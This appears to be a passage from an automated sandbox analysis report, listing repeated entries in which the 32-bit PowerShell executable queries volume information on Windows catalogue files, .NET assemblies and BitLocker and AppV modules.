                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
